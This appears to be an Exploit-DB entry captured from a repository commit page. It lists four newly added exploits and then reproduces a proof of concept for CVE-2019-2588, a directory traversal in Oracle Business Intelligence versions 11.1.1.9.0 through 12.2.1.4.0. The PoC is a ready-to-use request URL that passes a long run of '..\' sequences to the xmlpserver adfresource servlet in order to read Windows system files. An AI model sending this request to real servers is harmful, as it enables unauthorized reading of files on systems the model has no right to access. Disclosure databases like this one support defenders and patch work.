aaf10d8566
4 changes to exploits/shellcodes SystemTap 1.3 - MODPROBE_OPTIONS Privilege Escalation (Metasploit) Atlassian Confluence Widget Connector Macro - Velocity Template Injection (Metasploit) Oracle Business Intelligence 11.1.1.9.0 / 12.2.1.3.0 / 12.2.1.4.0 - Directory Traversal Oracle Business Intelligence / XML Publisher 11.1.1.9.0 / 12.2.1.3.0 / 12.2.1.4.0 - XML External Entity Injection
13 lines
No EOL
512 B
Text
13 lines
No EOL
512 B
Text
# Exploit Title: Directory traversal in Oracle Business Intelligence
|
|
# Date: 16.04.19
|
|
# Exploit Author: @vah_13
|
|
# Vendor Homepage: http://oracle.com
|
|
# Software Link:
|
|
https://www.oracle.com/technetwork/middleware/bi-enterprise-edition/downloads/index.html
|
|
# Version: 11.1.1.9.0, 12.2.1.3.0, 12.2.1.4.0
|
|
# Tested on: Windows
|
|
# CVE : CVE-2019-2588
|
|
|
|
PoC
|
|
|
|
http://server:9502/xmlpserver/servlet/adfresource?format=aaaaaaaaaaaaaaa&documentId=..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.ini |